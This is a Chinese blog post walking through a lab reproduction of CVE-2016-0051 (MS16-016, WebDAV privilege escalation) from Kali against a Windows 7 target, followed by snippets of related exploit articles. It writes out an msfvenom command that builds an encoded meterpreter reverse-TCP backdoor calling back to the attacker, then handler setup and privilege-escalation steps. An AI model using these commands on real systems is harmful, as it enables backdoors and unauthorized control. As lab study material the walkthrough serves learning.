CVE-2016-0051(WebDaV)漏洞复现

最新推荐文章于 2025-02-28 10:26:18 发布
最新推荐文章于 2025-02-28 10:26:18 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 各种漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/107876716
版权

MS16-016(WebDaV)漏洞复现
目标机:win7x64 192.168.235.142
攻击机:kali 192.168.235.137
1、 确定目标主机和攻击机能够ping通
在这里插入图片描述
在这里插入图片描述
2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端口号) -e(-e表示encoder编码) x86/shinkata_ga_nai -i(-I 编码次数) 5 -b(将制定特征进行再编码) ‘x00’ -f(生成文件的格式) exe -o(生成路径及文件名) /root/1.exe
在这里插入图片描述
3、打开win7主机上的winSCP软件用来模仿文件下载
在这里插入图片描述
4、登录192.168.235.137 端口默认22 用来下载文件
在这里插入图片描述
5、已经登录到这个服务器进行文件下载
在这里插入图片描述
将文件1.exe的文件下载到桌面上木马文件已经上传
6、启动msf 终端输入msfconsole
在这里插入图片描述
7、终端中输入use exploit/multi/handler 进入到该模块 show options查看选项
在这里插入图片描述
8、set payload windows/meterpreter/reverse_tcp设置生成木马时 用的payload
在这里插入图片描述
9、show options 设置本地IP 端口 set LHOST 192.168.235.137 set LPORT 2222
在这里插入图片描述
在这里插入图片描述
10、show options 查看配置后的信息
在这里插入图片描述
11、输入run开始监听目标机
在这里插入图片描述
12、双击win7上的1.exe返回kali一个会话
在这里插入图片描述
输入session -l 查看会话id 看到是1 输入session 1
得到meterpreter
在这里插入图片描述
13、输入sysinfo查看目标机信息
在这里插入图片描述
输入getuid 查看当前获取的用户权限
在这里插入图片描述
14、终端中输入ps 看见木马程序1.exe的进程id为 2924
在这里插入图片描述
15、输入migrate 1608尝试将其添加到mysqld 进程中
在这里插入图片描述结果权限不够
16、输入background转入后台.
在这里插入图片描述
17、下面我们进行提权 search ms16 搜索这个相关的模块
并切换到该模块
在这里插入图片描述
在这里插入图片描述
配置会话id
在这里插入图片描述
18、run进行攻击导致蓝屏

漏洞复现】CrushFTP 认证绕过模板注入漏洞(CVE-2024-4040)
qq_67810151的博客
04-28 819
CVE-2024-4040 中,攻击者可构造恶意请求利用模版注入获取他人身份凭据,读取文件等,配合相关功能可造成远程代码执行,控制服务器。
Web中间件常见安全漏洞总结_web中间件常见漏洞总结
06-25 1324
4.打开IIS,管理工具 ->Internet 信息服务(IIS)管理器5.选择编辑ISAPI或者CGI限制添加安装的php-cgi.exe路径,描述随意6.返回第五步的第一个图片位置,点击处理程序映射,添加如下。7.phpinfo测试IIS7.x版本 在Fast-CGI运行模式下,在任意文件,例:test.jpg后面加上/.php,会将test.jpg 解析为php文件。配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序。
WebDav漏洞简单分析及通用exploit设计
FreeXploiT
10-29 2274
WebDav漏洞简单分析及通用exploit设计    拜读了isno写的>、>,以及Nankia写的>之后,用他们发布的exploit、以及能在网上找到的exploit在我的一些测试机上测试,有些成功,有些不成功。于是便想自己调试一下。在后来的调试过程中,参考了大量资料,特别是yuange所写的>。在这过程中我学到了很多东西,自己也有些心得体会,其中可能有不少错误的地方,于是便想写下来,一来请各
WebDav服务器漏洞利用
奇葩
12-06 3248
参考链接:https://charlesreid1.com/wiki/Metasploitable/Apache/DAV 生成php后门 将php后门,通过dav上传到服务器中 服务器中就多了一个文件 使用msf 点击web的文件,使得反射payload生效 入侵靶机成功 ...
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
最新发布
Python84310366的博客
02-28 1028
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
WebDAVScan-WebDAV漏洞扫描器
10-31
WebDAV漏洞扫描器 扫描系统中是否存在WebDAV漏洞
CVE-2016-0051, EoP 2016 0051的EoP ( Win7 ) &蓝屏( Win10 ) PoC ( MS 016.zip
10-10
CVE-2016-0051, EoP 2016 0051的EoP ( Win7 ) &蓝屏( Win10 ) PoC ( MS 016 CVE-2016-0051Proof-of-concept BSoD ( 蓝屏死亡画面) 和提升我的CVE-2016-0051 ( ms-016 )的特权( 到系统) 代码。 EoP到 Windows 7 SP1 x86系统 W
python创建一个目录_生成一个运行sDist的目录并创建一个空的sDist包
weixin_30019895的博客
12-24 681
创建了一个安装文件。用下面的代码设置.py是import sysfrom distutils.core import setupsetup(name='SomePackage',author='dave',version='0.1.0',author_email='dave',packages=['apples',],license='LICENSE.txt',url="None",include...
CVE-2017-7269 IIS6.0WebDAV远程代码执行漏洞复现(Window提权)
ranuy阮的博客
04-19 2687
漏洞说明:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证) 触发函数:ScStoragePathFromUr...
CrushFTP 服务器端模板注入漏洞(CVE-2024-4040)复现
huangyongkang666的博客
04-27 2074
CrushFTP是由CrushFTP LLC开发的文件传输服务器软件。CrushFTP的主要用途是提供安全、可靠的文件传输服务。它允许用户通过多种协议(如FTP、SFTP、HTTP、WebDAV等)安全地上传、下载和管理文件。CrushFTP提供了许多安全特性,包括SSL/TLS加密、用户认证、目录权限控制等。CrushFTP被广泛用于企业、教育机构和个人用户之间安全地传输文件。由于CrushFTP 存在服务器端模板注入漏洞,未经身份验证的远程攻击者可以逃避虚拟文件系统(VFS)沙箱,绕过身份验证获得管理访
CVE-2021-26855
03-12
2021年,四个零日漏洞(也被统称为 Hafnium 攻击)被发现,其中 CVE-2021-26855 是最重要的一个,它涉及到 Exchange Server 上的一个服务器端请求伪造(SSRF)漏洞,可以通过 WebDAV 接口来触发。 **漏洞原理** ...
IIS6.0漏洞CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 4056
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
IIS 6.0 WebDAV远程代码执行(CVE-2017-7269) 含POC与修复方法
Anprou的博客
03-28 5563
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016
web常见中间件漏洞详解
m0_55854679的博客
08-31 581
它可以运行在几乎所有广泛使用的 计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。如果存在文件名类似的文件,则前面的6个字符是相同的,后面的数字进行递增。的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回。一样,属于配置方面的问题,错误的配置可导致目录遍历与源码的泄露。.
我用php开发的webdav协议的软件phpdav
weixin_33997389的博客
05-04 1545
2019独角兽企业重金招聘Python工程师标准>>> ...
Web中间件常见漏洞总结
qq_35358965的博客
05-09 3106
是一类提供系统软件和应用软件之间的连接,便于软件各部件之间的沟通的软件,应用软件可以借助中间件在不同的技术架构之间共享信息和资源。中间件位于客户机服务器的操作系统之上,管理着计算资源和网络通信。中间件=平台+通信。
CVE-2016-5734漏洞复现
qq_56426046的博客
09-11 531
在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值